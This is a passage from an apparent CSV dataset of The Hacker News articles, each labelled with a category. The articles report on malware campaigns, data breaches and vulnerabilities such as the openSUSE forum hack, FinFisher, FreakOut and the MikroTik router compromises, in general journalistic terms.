Office file is to save it to a trusted location, allowing macros to run. ",Malware Exclusive - openSUSE Forum Hacked; 79500 Users Data Compromised,https://thehackernews.com/2014/01/openSUSE-Forum-Hacked-by-Pakistani-hacker.html,"After Snapchat hack, this can be another worst data breach of the new year. A Pakistani hacker 'H4x0r HuSsY' has successfully compromised the official Forum of 'openSUSE', a Linux distro developed, sponsored & supported by SUSE. The hacker managed to deface the Forum and uploaded its custom message page as shown and account information of 79,500 registered users' may have been compromised. (The forum was defaced at the time of writing - Check Here) The popular website MacRumors's Forum was compromised in last November using an alleged zero day exploit, which is based on vBulletin, a famous forum software. The openSUSE Forum is also based upon vBulletin. Another interesting fact is that openSUSE is still using vBulletin 4.2.1, which is vulnerable to inject rogue administrator accounts flaw. Whereas, the latest patched vBulletin 5.0.5 is available. Possibly, Hacker exploits same or another known vBulletin version 4.2.1 vulnerability to access the website's administrative panel. Zone-H Mirror of the defaced page: https://zone-h.org/mirror/id/21473823 It seems that openSUSE team is even not aware about the data breach, but we have informed them and also trying to contact the hacker for further information on this. Update (7:00 PM Tuesday, January 7, 2014 GMT): The Pakistani Hacker confirmed is that has uploaded a PHP shell on the forum server using his own Private vBulletin's zero-day exploit, that allows him to browse, read or write/overwrite any file on the Forum server without root privileges. There are a few screenshots shared by hacker with us: He also claimed to have the full access to the user's database, however he has promised not to disclose the database dump because the purpose of the hack is only to highlight the security weakness. Another important claim by the hacker that vBulletin 5.0.5 latest version is also vulnerable to his zero-day exploit and there is no patch yet available to fix it. He noticed that after our news report, the Server administrator has removed the defaced page, but to proof his exploit he has uploaded another file on the server again: There are thousands of Forums using vBulletin software and many of them are huge huge.. Well hacker has not shared any information about the vulnerability, but we are sure that official vBulletin team will consider this critical threat to fix with high priority. Update (7:24 PM Tuesday, January 7, 2014 GMT): openSUSE team has informed the users' via tweets about the breach,""Warning: Our forums are down because they were defaced. We're currently investigating what exactly has happened."" But they have mentioned that, ""Rest assured, no user credentials have been leaked as we use a single sign on system for our services. Note that we use SSO so we don't think we lost any account data."" After openSUSE's tweet, the hacker has shared some sample database screenshots on his Facebook account to prove the database hack. We have partially blur the screenshot before sharing, to keep sensitive data secure, as shown above. Update (4:00 AM Wednesday, January 8, 2014 GMT): In a blog post, openSUSE team confirmed that their website and database have been hacked, but users' passwords are not compromised. A cracker managed to exploit a vulnerability in the forum software which made it possible to upload files and gave access to the forum database. The team explained, they are using single-sign-on system (Access Manager from NetIQ) that manage the real passwords. Credentials for your openSUSE login are not saved in our application databases as we use a single-sign-on system (Access Manager from NetIQ) for all our services. This is a completely separate system and it has not been compromised by this crack. What the cracker reported as compromised passwords where indeed random, automatically set strings that are in no way connected to your real password. ",Data_Breaches Java based Cross platform malware targeting Apache Tomcat servers in the wild,https://thehackernews.com/2013/11/java-based-cross-platform-malware.html,"Takashi Katsuki, a researcher at Antivirus firm Symantec has discovered a new cyber attack ongoing in the wild, targeting an open-source Web server application server Apache Tomcat with a cross platform Java based backdoor that can be used to attack other machines. The malware, dubbed as ""Java.Tomdep"" differs from other server malware and is not written in the PHP scripting language. It is basically a Java based backdoor act as Java Servlet that gives Apache Tomcat platforms malicious capabilities. Because Java is a cross platform language, the affected platforms include Linux, Mac OS X, Solaris, and most supported versions of Windows. The malware was detected less than a month ago and so far the number of infected machines appears to be low. You may think that this type of attack only targets personal computers, such as desktops and laptops, but unfortunately that isn't true. Servers can also be attacked. They are quite valuable targets, since they are usually high-performance computers and run 24x7. Java worm seeks out for the system having Apache Tomcat installed-running and then attempts to log-in using the password brute-force attack using combinations of user names and passwords. After installation, the malware servlet behaves like an IRC Bot and able to receive commands from an attacker. Malware is capable of sending-downloading files from the system, create new processes, update itself, can setup SOCKS proxy, UDP flooding i.e. Can perform massive DDoS Attack. They have mentioned that the command-and-control servers have been traced to Taiwan and Luxembourg. In order to avoid this threat, ensure that your server and AV products are fully patched and updated. ",Malware Firefox 67.0.4 Released — Mozilla Patches Second 0-Day Flaw This Week,https://thehackernews.com/2019/06/firefox-0day-vulnerability.html,"Okay, folks, it's time to update your Firefox web browser once again—yes, for the second time this week. After patching a critical actively-exploited vulnerability in Firefox 67.0.3 earlier this week, Mozilla is now warning millions of its users about a second zero-day vulnerability that attackers have been found exploiting in the wild. The newly patched issue (CVE-2019-11708) is a ""sandbox escape"" vulnerability, which if chained together with the previously patched ""type confusion"" bug (CVE-2019-11707), allows a remote attacker to execute arbitrary code on victims' computers just by convincing them into visiting a malicious website. Browser sandboxing is a security mechanism that keeps third-party processes isolated and confined to the browser, preventing them from damaging other sensitive parts of a computer's operating system. ""Insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes can result in the non-sandboxed parent process opening web content chosen by a compromised child process,"" the advisory explains. Firefox 0-Days Found Exploited in the Wild Mozilla has already been aware of the first issue since April when a Google Project Zero researcher reported it to the company, but it learned about the second issue and attacks in the wild just last week when attackers started exploiting both the flaws together to target employees from Coinbase platform and users of other cryptocurrency firms. Just yesterday, macOS security expert Patrick Wardle also published a report revealing that a separate campaign against cryptocurrency users is also using same Firefox 0-days to install a macOS malware on targeted computers. At this moment it's not clear if attackers independently discovered the first vulnerability just in time when it was already reported to Mozilla or gained classified bug-report information through another way. Install Firefox Patches to Prevent Cyber Attacks Anyway, the company has now released Firefox version 67.0.4 and Firefox ESR 60.7.2 that address both the issues, preventing attackers from remotely taking control over your systems. Though Firefox installs latest available updates automatically, users are still advised to ensure they are running Firefox 67.0.4 or later. Besides this, just like the patch for the previous issue, it is also expected that the Tor Project will once again release a new version of its privacy browser very soon to patch the second bug as well. Important Update (21/06/2019) ➤ The Tor Project on Friday also released second update (Tor Browser 8.5.3) for its privacy web-browser this week that patches the second vulnerability Firefox patched yesterday. ",Cyber_Attack Experts Uncover Yet Another Chinese Spying Campaign Aimed at Southeast Asia,https://thehackernews.com/2021/06/experts-uncover-yet-another-chinese.html,"An ongoing cyber-espionage operation with suspected ties to China has been found targeting a Southeast Asian government to deploy spyware on Windows systems while staying under the radar for more than three years. ""In this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor on victim's machines,"" researchers from Check Point Research said in a report published today. The infection chain works by sending decoy documents, impersonating other entities within the government, to multiple members of the Ministry of Foreign Affairs, which, when opened, retrieves a next-stage payload from the attacker's server that contains an encrypted downloader. The downloader, in turn, gathers and exfiltrates system information to a remote server that subsequently responds back with a shellcode loader. The use of weaponized copies of legitimate-looking official documents also suggests that ""the attackers first had to attack another department within the targeted state, stealing and weaponizing documents for use against the Ministry of Foreign Affairs,"" said Lotem Finkelstein, head of threat intelligence at Check Point. The last link in the attack involves the loader establishing a connection with the remote server to download, decrypt, and execute an implant dubbed ""VictoryDll_x86.dll"" that's capable of performing file operations, capturing screenshots, creating and terminating processes, and even shutting down the infected machine. Check Point said the adversary placed significant effort into concealing its activity by changing the infrastructure multiple times since its development in 2017, with the backdoor receiving its own fair share of revisions to make it more resilient to analysis and decrease the detection rates at each stage. The long-running campaign has been linked with ""medium to high confidence"" to a Chinese advanced persistent threat (APT) group it calls ""SharpPanda"" based on test versions of the backdoor dating back to 2018 that were uploaded to VirusTotal from China and the actor's use of Royal Road RTF weaponizer, a tool that been used in campaigns attributed to well-known Chinese threat groups since late 2018. Several other clues point to this conclusion, including the fact that the command-and-control (C2) servers returned payloads only between 01:00 and 08:00 UTC, which the researchers suspect are the working hours in the attackers' country, and that no payloads were returned by the C2 servers between May 1 and 5 — even during working hours — which coincides with the Labor Day holidays in China. The development is yet another indication that multiple cyberthreat groups believed to be working in support of China's long-term economic interests are continuing to hammer away at networks belonging to governments and organizations, while simultaneously spending a great deal of time refining the tools in their arsenal in order to hide their intrusions. ""All the evidence points to the fact that we are dealing with a highly-organized operation that placed significant effort into remaining under the radar,"" Finkelstein said. ""All in all, the attackers, who we believe to be a Chinese threat group, were very systematic in their approach."" ""The attackers are not only interested in cold data, but also what is happening on a target's personal computer at any moment, resulting in live espionage. Although we were able to block the surveillance operation for the Southeast Asian government described, it's possible that the threat group is using its new cyber espionage weapon on other targets around the world,"" he added. ",Malware ZeuS Trojan variant Targets Salesforce accounts and SaaS Applications,https://thehackernews.com/2014/02/Salesforce-malware-attack-zeus-trojan.html,"Zeus, a financially aimed Banking Trojan that comes in many different forms and flavors, is capable to steal users' online-banking credentials once installed. This time, an infamous Zeus Trojan has turned out to be a more sophisticated piece of malware that uses web-crawling action. Instead of going after Banking credentials and performing malicious keystroke logging, a new variant of Zeus Trojan focuses on Software-as-a-service (SaaS) applications for the purpose of obtaining access to proprietary data or code. The SaaS Security firm vendor Adallom, detected a targeted malware attack campaign against a Salesforce.com customer, which began as an attack on an employee's home computer. Adallom found that the new variant had web crawling capabilities that were used to grab sensitive business data from that customer's CRM instance. The Security firm noticed the attack when they saw about 2GB of data been downloaded to the victim's computer in less than 10 minutes. Furthermore, while Zeus usually hijacks the user session and performs wire transactions, this variant crawled the site and created a real time copy of the user's Salesforce.com instance that contained all the information from the company account. ""This looks like a targeted attack against the company, cleverly targeting the employee home instead of the enterprise – thus bypassing the company controls. This was probably just the first step, using the Zeus Web inject capabilities they could have used the same tactics as in the banking sites attacks and ask the user to enter more information regarding his company credentials or send out messages in his name,"" says Ami Luttwak, co-founder and CTO of Adallom. Zeus Trojan is one of the most popular family of banking Trojan. Also in 2012, the FBI warned us about the 'GameOver' banking Trojan, a variant of Zeus financial malware that spreads via phishing emails. GameOver makes fraudulent transactions from your bank once installed in your system with the capability to conduct Distributed Denial of Service, or DDoS, attack using a botnet, which involves multiple computers flooding the financial institution's server with traffic in an effort to deny legitimate users access to the site. At the beginning of this year, Security researcher Gary Warner explains the behavior of the new variant of GameOver Zeus malware that uses Encryption to bypass perimeter security, in a blog post. The attackers now bypassing traditional security measures and putting Zeus to use it against Salesforce.com and possibly other SaaS applications in a type of attack that Adallom refers to as ""land-mining"" and ""rolladexing"" to grab loads of business data and customer information. The Adallom Labs team has yet to figure out exactly how these machines were infected and who are behind the cyber attack, so the matter is still being investigated by them. ",Cyber_Attack ISPs May Be Helping Hackers to Infect you with FinFisher Spyware,https://thehackernews.com/2017/09/gamma-finfisher-hacking-tool.html,"Are you sure the version of WhatsApp, or Skype, or VLC Player installed on your device is legitimate? Security researchers have discovered that legitimate downloads of several popular applications including WhatsApp, Skype, VLC Player and WinRAR have reportedly been compromised at the ISP level to distribute the infamous FinFisher spyware also known as FinSpy. FinSpy is a highly secret surveillance tool that has previously been associated with British company Gamma Group, a company that legally sells surveillance and espionage software to government agencies across the world. The spyware has extensive spying capabilities on an infected computer, including secretly conducting live surveillance by turning ON its webcams and microphones, recording everything the victim types with a keylogger, intercepting Skype calls, and exfiltration of files. In order to get into a target's machine, FinFisher usually uses various attack vectors, including spear phishing, manual installation with physical access to the device, zero-day exploits, and watering hole attacks. Your ISP May Be Helping Hackers To Spy On You However, a new report published today by ESET claimed that its researchers had discovered new surveillance campaigns utilizing new variants of FinFisher in seven countries, which comes bundled with a legitimate application. But how is this happening? Attackers are targeting victims using a man-in-the-middle (MitM) attack, where the internet service providers (ISP) are most likely operating as the ""middle man""—bundling legitimate software downloads with FinFisher. ""We have seen this vector being used in two of the countries in which ESET systems detected the latest FinFisher spyware (in the five remaining countries, the campaigns have relied on traditional infection vectors),"" the researchers say. Previously published documents by WikiLeaks also indicated that the FinFisher maker also offered a tool called ""FinFly ISP,"" which is supposed to be deployed on ISP level with capabilities necessary for performing such a MitM attack. Also, the infection technique (using the HTTP 307 redirect) was implemented in the same way in the two affected countries ESET discovered being targeted by the new variants of FinFisher. However, the firm did not name the affected countries ""as not to put anyone in danger."" Another fact which supports the ISP-level MitM attack is that all affected targets identified by the researchers within a country were using the same ISP. ""Finally, the very same redirection method and format have been used for internet content filtering by internet service providers in at least one of the affected countries,"" the ESET report reads. The popular applications targeted by the new variants of FinFisher include WhatsApp, Skype, VLC Player, Avast and WinRAR, and the ESET researchers said, ""virtually any application could be misused in this way."" Here's How The Attack Works: When the target users search for one of the affected applications on legitimate websites and click on its download link, their browser is served a modified URL, which redirects victims to a trojanized installation package hosted on the attacker's server. This results in the installation of a version of the intended legitimate application bundled with the surveillance tool. ""The redirection is achieved by the legitimate download link being replaced by a malicious one,"" the researchers say. ""The malicious link is delivered to the user's browser via an HTTP 307 Temporary Redirect status response code indicating that the requested content has been temporarily moved to a new URL."" This whole redirection process, according to researchers, is ""invisible to the naked eye"" and occurs without user's knowledge. FinFisher Utilizing a Whole Lot of New Tricks The new tricks employed by the latest version of FinFisher kept it from being spotted by the researchers. The researchers also note that the latest version of FinFisher received several technical improvements in terms of stealthiness, including the use of custom code virtualization to protect the majority of its components like the kernel-mode driver. It also makes use of anti-disassembly tricks, and numerous anti-sandboxing, anti-debugging, anti-virtualization and anti-emulation tricks, aiming at compromising end-to-end encryption software and known privacy tools. One such secure messaging application, called Threema, was discovered by the researchers while they were analyzing the recent campaigns. ""FinFisher spyware masqueraded as an executable file named ""Threema."" Such a file could be used to target privacy-concerned users, as the legitimate Threema application provides secure instant messaging with end-to-end encryption,"" the researchers say. ""Ironically, getting tricked into downloading and running the infected file would result in the privacy-seeking user being spied upon."" Gamma Group has not yet responded to the ESET report. ",Malware New Bugs Could Let Hackers Bypass Spectre Attack Mitigations On Linux Systems,https://thehackernews.com/2021/03/new-bugs-could-let-hackers-bypass.html,"Cybersecurity researchers on Monday disclosed two new vulnerabilities in Linux-based operating systems that, if successfully exploited, could let attackers circumvent mitigations for speculative attacks such as Spectre and obtain sensitive information from kernel memory. Discovered by Piotr Krysiuk of Symantec's Threat Hunter team, the flaws — tracked as CVE-2020-27170 and CVE-2020-27171 (CVSS scores: 5.5) — impact all Linux kernels prior to 5.11.8. Patches for the security issues were released on March 20, with Ubuntu, Debian, and Red Hat deploying fixes for the vulnerabilities in their respective Linux distributions. While CVE-2020-27170 can be abused to reveal content from any location within the kernel memory, CVE-2020-27171 can be used to retrieve data from a 4GB range of kernel memory. First documented in January 2018, Spectre and Meltdown take advantage of flaws in modern processors to leak data that are currently processed on the computer, thereby allowing a bad actor to bypass boundaries enforced by the hardware between two programs to get hold of cryptographic keys. Put differently, the two side-channel attacks permit malicious code to read memory that they would typically not have permission to. Even worse, the attacks could also be launched remotely via rogue websites running malicious JavaScript code. Although isolation countermeasures have been devised and browser vendors have incorporated defenses to offer protection against timing attacks by reducing the precision of time-measuring functions, the mitigations have been at an operating system level rather than a solution for the underlying issue. The new vulnerabilities uncovered by Symantec aim to get around these mitigations in Linux by taking advantage of the kernel's support for extended Berkeley Packet Filters (eBPF) to extract the contents of the kernel memory. ""Unprivileged BPF programs running on affected systems could bypass the Spectre mitigations and execute speculatively out-of-bounds loads with no restrictions,"" Symantec said. ""This could then be abused to reveal contents of the memory via side-channels."" Specifically, the kernel (""kernel/bpf/verifier.c"") was found to perform undesirable out-of-bounds speculation on pointer arithmetic, thus defeating fixes for Spectre and opening the door for side-channel attacks. In a real-world scenario, unprivileged users could leverage these weaknesses to gain access to secrets from other users sharing the same vulnerable machine. ""The bugs could also potentially be exploited if a malicious actor was able to gain access to an exploitable machine via a prior step — such as downloading malware onto the machine to achieve remote access — this could then allow them to exploit these vulnerabilities to gain access to all user profiles on the machine,"" the researchers said. News of the two flaws come weeks after Google published a proof-of-concept (PoC) code written in JavaScript to demonstrate Spectre in a web browser and leak data at a speed of 1 kilobyte per second (kB/s) when running on Chrome 88 on an Intel Skylake CPU. ",Vulnerability Police Arrested Hackers Who Stole Millions from European ATMs,https://thehackernews.com/2016/01/european-atm-hacker.html,"Romanian law enforcement authorities have arrested eight cyber criminals suspected of being part of an international criminal gang that pilfered cash from ATMs (automatic teller machines) using malware. The operation said to be one of the first operations of this type in Europe, was conducted in Romania and Moldova by Romanian National Police and the Directorate for Investigating Organised Crimes and Terrorism (DIICOT), with assistance from Europol, Eurojust and other European law enforcement authorities. Europol did not provide names of any of the eight criminals arrested but said that the gang allegedly used a piece of malware, dubbed Tyupkin, to conduct what are known as Jackpotting attacks and made millions by infecting ATMs across Europe and beyond. With the help of Tyupkin malware, the suspects were able to empty cash from infected ATMs by issuing commands through the ATM's pin pad. ""The criminal group was involved in large scale ATM Jackpotting – a term which refers to the use of a Trojan horse, physically launched via an executable file in order to target an ATM,"" Europol explained in a press release, ""thus allowing the attackers to empty the ATM cash cassettes via direct manipulation, using the ATM PIN pad to submit commands to the Trojan."" Tyupkin was first analysed in 2014 by Kaspersky Lab following the request from a financial institution. During the investigation, Kaspersky found the malware threat on more than 50 ATMs in Eastern Europe. The malware allows its operators to withdraw cash from ATMs without the requirement of any payment card. Although, Europol did not specify how much money in total the criminal gang was able to plunder, it believed that the gang was able to cause ""substantial losses"" across Europe and that the losses could be in Millions. ",Malware Windows Servers Hacked at The Hartford Insurance Company !,https://thehackernews.com/2011/04/windows-servers-hacked-at-hartford.html,"Hackers have broken into The Hartford insurance company and installed password-stealing programs on several of the company's Windows servers. In a warning letter sent last month to about 300 employees, contractors, and a handful of customers, the company said it discovered the infection in late February. Several servers were hit, including Citrix servers used by employees for remote access to IT systems. A copy of The Hartford's letter was posted earlier this week to the website of the Office of the New Hampshire Attorney General : https://doj.nh.gov/consumer/pdf/hartford2.pdf ""It was a very small incident,"" said Debora Raymond, a company spokeswoman. The victims were mostly company employees. Less than 10 customers were affected by the malware, the W32-Qakbot Trojan, she said. Qakbot has been around for about two years. Once installed it spreads from computer to computer in the network, taking steps to cover its tracks as it logs sensitive data and opens up back doors for the hackers to access the network. With 28,000 employees worldwide, the 200-year-old Hartford, Connecticut, firm is one of the country's largest insurance companies. The Hartford's letters are going out to ""users who logged onto an infected server (either through a Citrix session or support purposes)"" between Feb. 22 and Feb. 28, 2011, The Hartford said in its letter. ""We do know that the virus has the potential to capture confidential data such as bank account numbers, Social Security numbers, user accounts/logins, passwords, and credit card numbers,"" the letter states. It's not clear how The Hartford was infected, but hackers have been targeting staffers for years now -- particularly those in IT -- with targeted e-mail attacks, trying to trick them into visiting malicious websites or downloading Trojan horse programs. Security experts say that these attacks are widespread and often methodically planned. Despite the presence of keylogging software, the insurance company's lawyer, Debra Hampson, said that her company has ""no reason to believe that any information has been or will be misused."" Victims are being given two years' free credit monitoring. Working with its antivirus vendor, The Hartford has cleaned up the infected servers and is working on locking down its systems. One of the steps, Hampson said: ""Providing additional privacy and information security training for employees in order to warn them of the dangers of downloading files from unknown sources on the Internet."" Source : https://www.pcworld.com/ ",Malware U.S. Department of Defense Officials are potential target of cyber espionage via social networking sites,https://thehackernews.com/2013/05/us-department-of-defense-officials-are.html,"In the recent months I had the opportunity to conduct an interesting study on the use of Social Media in the Military Sector, large diffusion of media platforms makes them very attractive for governments and intelligence agencies. Social media platforms reveal enormous potentiality that could be exploited also in critical sectors such as military and defense. Modern social media networks are actively used by every government, the US, China and Russia are the most active in this field, but also emerging cyber countries like Iran and North Korea demonstrates an increasing interest in the matter. The principal uses of social media for government are Psychological Operations (PsyOps) OSInt Cyber espionage Offensive purposes On May 10th the Illinois Air National Guard 183rd Fighter Wing published a notice in the monthly issue of a newsletter titled Falcon View. The notice, that seems to be authentic, dedicates a paragraph to the use of social networking sites for computer network exploitation. According the notice foreign governments regularly use social networks to conduct cyber attacks against DoD, attackers adopt social engineering techniques to gather sensitive information creating ""significant operations security (OPSEC) concern"". The impact is serious, leak of knowledge of the cyber threats could cause mission degradation or even loss of life, but great concern is also reserved to the possibility of use of social network platforms to inoculate malware in US AF networks. ""The nature of social networking sites (SNS) which promote socialization and the sharing of information makes personnel more susceptible to exploitation"" reports the notice. The notice and with special recommendations to all Air Force members related to the use of social networks, informing on the risks related to cyber espionage conducted by state sponsored hackers: ""Finally, be aware of the security settings on these websites and do not inadvertently release sensitive information to the public because of careless use."" Following the integral notice, Notice to Airman 2013-080-001: (U//FOUO) EXECUTIVE SUMMERY: Nation-state adversaries regularly use accounts on popular social networking sites to facilitate social engineering against DoD members. Information disclosed or discovered on social networking sites creates a significant operations security (OPSEC) concern and in the context of a wide spread collection effort could be by adversaries to form a classified picture. (U//FOUO) MISSION IMPACT: Poor OPSEC practices or general disclosures of sensitive information can lead to kinetic adversary responses to U.S. forces' actions, potentially leading to mission degradation or even loss of life. Additionally, malware introduced into AF networks via social network sites can degrade or disrupt operations. (U//FOUO) DETAILS: The nature of social networking sites (SNS) which promote socialization and the sharing of information makes personnel more susceptible to exploitation. SNS applications give the common user an increased opportunity to release official information. In the past two years, there are several examples of adversaries using or attempting to use SNS for likely cyber espionage. (U//FOUO) ACTIONS: All Air Force members must be aware that they are a potential target of cyber exploitation/espionage and take appropriate caution when using social networking sites. Do not accept contact requests from individuals who you do not personally know and trust. Additionally, hackers are known to spoof requests so that any request may appear to be from someone you know, so treat all requests with suspicion and vigilance. Only accept a request if there is a high level of certainty regarding the identity and authenticity of the requestor. Finally, be aware of the security settings on these websites and do not inadvertently release sensitive information to the public because of careless use. ",Cyber_Attack BREACH decodes HTTPS encrypted data in 30 seconds,https://thehackernews.com/2013/08/sniffing-https-BREACH-exploit-blackhat-hacking-tool.html,"A new hacking technique dubbed BREACH can extract login tokens, session ID numbers and other sensitive information from SSL/TLS encrypted web traffic in just 30 seconds. The technique was demonstrated at the Black Hat security conference in Las Vegas (Presentation PDF & Paper) by Gluck along with researchers Neal Harris and Angelo Prado, which allows hackers to decodes encrypted data that online banks and e-commerce sites from an HTTPS channel. Neal, Yoel and Angelo (From left to right) at BlackHat BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) is very targeted and don't decrypt the entire channel. BREACH manipulates data compression to pry out doses of information from HTTPS protected data, including email addresses, security tokens, and other plain text strings. Angelo Prado told The Hacker News, ""We are using a compression oracle is leveraging the building blocks from CRIME, on a different compression context."" i.e. To execute the oracle attack, BREACH exploits the standard Deflate compression algorithm used by many websites to conserve bandwidth. The attacker just has to continually eavesdrop on the encrypted traffic between a victim and a web server before and the exploit requires that a victim first access a malicious link, this can be done by embedding an iframe tag in a page the victim frequents. The recovery of secret authentication cookies opens the door for attackers to pose as their victims and hijack authenticated web sessions. It is important to note that the attack is agnostic to the version of TLS/SSL, and does not require TLS-layer compression. Additionally, the attack works against any cipher suite. ",Vulnerability Chinese Hackers Broke into the Database of U.S. Federal Employees,https://thehackernews.com/2014/07/chinese-hackers-broke-into-database-of.html,"Chinese hackers broke into the computer systems of United States government agency that keeps the personal information of all federal employees, according to the paper published in the New York Times. The attack occurred on the Office of Personnel Management and Senior American officials believe that the attackers successfully gained access to some of the agency's databases in March before the federal authorities detected the threat and blocked them from the network. The hackers targeted the files of tens of thousands of federal employees who have applied for top-secret security clearances, the newspaper reported. ""The intrusion at the Office of Personnel Management was particularly disturbing because it oversees a system called e-QIP, in which federal employees applying for security clearances enter their most personal information, including financial data. Federal employees who have had security clearances for some time are often required to update their personal information through the website,"" states the New York Times. Until now, it is not clear how far the hackers were able to infiltrate the networks of the US Office of Personnel Management. But the databases they managed to hack include information such as employment records, people seeking security clearance list their foreign contacts, previous jobs and personal data like past drug use etc, which all could be at risk. In response to this matter, a senior Department of Homeland Security official confirmed that the attack had occurred but said that ""at this time,"" neither the personnel agency nor Homeland Security had ""identified any loss of personally identifiable information."" The official said an emergency response team was assigned and handled over the matter ""to assess and mitigate any risks identified."" Again it started a cold war between China and the United States, because according to the senior US officials, the attack was traced to China. But yet it is unclear if the hackers belonged to the government. Where China said that it faces a major threat from hackers, accused the NSA and U.S. Cyber Command for targeting Chinese politicians and military. The United States recently charged five Chinese military officials for carrying out cyber espionage against several American companies and stealing sensitive data by breaking into corporate systems. ",Data_Breaches Hardware based malware steals contacts from all mobile platforms using only the Audio Jack!,https://thehackernews.com/2012/11/hardware-based-malware-steals-contacts.html,"Indian Security Research Atul Alex presented his surprise paper at the International Malware Conference, MalCon on what can be termed as the onset of next generation of hardware based malware that can target mobile devices irrespective of Platforms. Typically, one of the largest challenges for malware coders are to target multiple platforms. A malware for Android will not work in Windows phone, Symbian or Apple iOS, which come in way of malware coders. Also, devices such as iPhone are extremely secure and there is little that can be extracted from a locked / secure iPhone, unless they are jailbroken. Atul Alex's research abuses voice dialing feature which is enabled by default on all mobile platforms - and combines a bugged headset with a micro controller and code to steal private data. The bugged headset can also dial a pre-defined number by detecting if the device is in use or not and turn the phone into a spy device. Further, it can steal contacts from all devices - Blackberry, iphone, Symbian, Windows and Android, without putting a malware inside the mobile phone. The bugged headset can in fact mimic voice commands and send it to the device discretely - and Alex mentioned that advanced software like SIRI can infact aid hackers in future in sending unauthorized text messages as well as extract personal data and device information. Any mobile device running Google Android, Microsoft Windows Phone, Apple IOS 5, or Blackberry OS provides voice command capabilities. Some of the other possible things include knowing call duration and even record incoming and outgoing calls of users. And all this is possible just by plugging a bugged headset into the Audio jack. This has long term future implications and provides a grim future with electronics warfare. Malwares can now target people across all platforms, irrespective of 0-days in browsers, OS etc present or not.. and the last thing one would suspect is a gifted headset or speaker dock for your device. ",Malware FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities,https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html,"An ongoing malware campaign has been found exploiting recently disclosed vulnerabilities in network-attached storage (NAS) devices running on Linux systems to co-opt the machines into an IRC botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency. The attacks deploy a new malware variant called ""FreakOut"" by leveraging critical flaws fixed in Laminas Project (formerly Zend Framework) and Liferay Portal as well as an unpatched security weakness in TerraMaster, according to Check Point Research's new analysis published today and shared with The Hacker News. Attributing the malware to be the work of a long-time cybercrime hacker — who goes by the aliases Fl0urite and Freak on HackForums and Pastebin at least since 2015 — the researchers said the flaws — CVE-2020-28188, CVE-2021-3007, and CVE-2020-7961 — were weaponized to inject and execute malicious commands in the server. Regardless of the vulnerabilities exploited, the end goal of the attacker appears to be to download and execute a Python script named ""out.py"" using Python 2, which reached end-of-life last year — implying that the threat actor is banking on the possibility that that victim devices have this deprecated version installed. ""The malware, downloaded from the site hxxp://gxbrowser[.]net, is an obfuscated Python script which contains polymorphic code, with the obfuscation changing each time the script is downloaded,"" the researchers said, adding the first attack attempting to download the file was observed on January 8. And indeed, three days later, cybersecurity firm F5 Labs warned of a series of attacks targeting NAS devices from TerraMaster (CVE-2020-28188) and Liferay CMS (CVE-2020-7961) in an attempt to spread N3Cr0m0rPh IRC bot and Monero cryptocurrency miner. An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel to execute malicious commands. In FreakOut's case, the compromised devices are configured to communicate with a hardcoded command-and-control (C2) server from where they receive command messages to execute. The malware also comes with extensive capabilities that allow it to perform various tasks, including port scanning, information gathering, creation and sending of data packets, network sniffing, and DDoS and flooding. Furthermore, the hosts can be commandeered as a part of a botnet operation for crypto-mining, spreading laterally across the network, and launching attacks on outside targets while masquerading as the victim company. With hundreds of devices already infected within days of launching the attack, the researchers warn, FreakOut will ratchet up to higher levels in the near future. For its part, TerraMaster is expected to patch the vulnerability in version 4.2.07. In the meantime, it's recommended that users upgrade to Liferay Portal 7.2 CE GA2 (7.2.1) or later and laminas-http 2.14.2 to mitigate the risk associated with the flaws. ""What we have identified is a live and ongoing cyber attack campaign targeting specific Linux users,"" said Adi Ikan, head of network cybersecurity Research at Check Point. ""The attacker behind this campaign is very experienced in cybercrime and highly dangerous."" ""The fact that some of the vulnerabilities exploited were just published, provides us all a good example for highlighting the significance of securing your network on an ongoing basis with the latest patches and updates."" ",Malware Thousands of MikroTik Routers Hacked to Eavesdrop On Network Traffic,https://thehackernews.com/2018/09/mikrotik-router-hacking.html,"Last month we reported about a widespread crypto-mining malware campaign that hijacked over 200,000 MikroTik routers using a previously disclosed vulnerability revealed in the CIA Vault 7 leaks. Now Chinese security researchers at Qihoo 360 Netlab have discovered that out of 370,000 potentially vulnerable MikroTik routers, more than 7,500 devices have been compromised to enable Socks4 proxy maliciously, allowing attackers to actively eavesdrop on the targeted network traffic since mid-July. The vulnerability in question is Winbox Any Directory File Read (CVE-2018-14847) in MikroTik routers that was found exploited by the CIA Vault 7 hacking tool called Chimay Red, along with another MikroTik's Webfig remote code execution vulnerability. Both Winbox and Webfig are RouterOS management components with their corresponding communication ports as TCP/8291, TCP/80, and TCP/8080. Winbox is designed for Windows users to easily configure the routers that download some DLL files from the router and execute them on a system. According to the researchers, more than 370,000 of 1.2 million MikroTik routers are still vulnerable to the CVE-2018-14847 exploit, even after the vendor has already rolled out security updates to patch the loophole. Netlab researchers have identified malware exploiting the CVE-2018-14847 vulnerability to perform various malicious activities, including CoinHive mining code injection, silently enabling Socks4 proxy on routers, and spying on victims. CoinHive Mining Code Injection — After enabling the Mikrotik RouterOS HTTP proxy, the attackers redirect all the HTTP proxy requests to a local HTTP 403 error page which injects a link for web mining code from Coinhive. ""By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users' devices,"" the researchers explain. ""What is disappointing for the attacker though, the mining code does not work in this way, because all the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs set by attackers themselves."" Maliciously Enabling Sock4 Proxy — Silently enabling the Socks4 port or TCP/4153 on victims device allows an attacker to gain control of the device even after it has been rebooted (IP change) by periodically reporting its latest IP address to the attacker's URL. According to the researchers, at present, a total of 239,000 IP addresses are confirmed to have Socks4 proxy enabled maliciously, eventually allowing attackers to continuously scan more MikroTik RouterOS devices using these compromised Socks4 proxy. Eavesdropping on Victims — Since the MikroTik RouterOS devices allow users to capture packets on the router and forward them to the specified Stream server, attackers are forwarding the traffic from compromised routers to IP addresses controlled by them. ""At present, a total of 7.5k MikroTik RouterOS device IPs have been compromised by the attacker, and their TZSP traffic is being forwarded to some collecting IP addresses,"" the researchers say. ""We also noticed the SNMP port 161 and 162 are also top on the list. This deserve some questions, why the attacker is paying attention to the network management protocol regular users barely use? Are they trying to monitor and capture some special users' 